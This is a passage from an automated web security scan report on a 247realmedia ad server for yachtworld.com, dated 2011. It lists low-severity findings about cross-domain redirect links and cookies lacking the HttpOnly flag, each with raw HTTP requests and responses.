GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

3.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 56 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://oasc05139.247realmedia.com/RealMedia/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/ HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 403 Forbidden
Date: Thu, 27 Jan 2011 19:43:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 309
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /RealMedia/ads/
on this server.</p>
...[SNIP]...

4.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1635
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...

4.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...

4.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1665
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...

4.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8543
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...

4.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...

4.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=32REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2006&maxyr=2006&minpr=108000&maxpr=108000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNxU10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXNyU10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

4.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQBU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:22:20 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXQCU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

4.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?&man=REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2005&maxyr=2005&minpr=112995&maxpr=112995&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOBU10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXOCU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 23704

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................Z....
...[SNIP]...

4.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
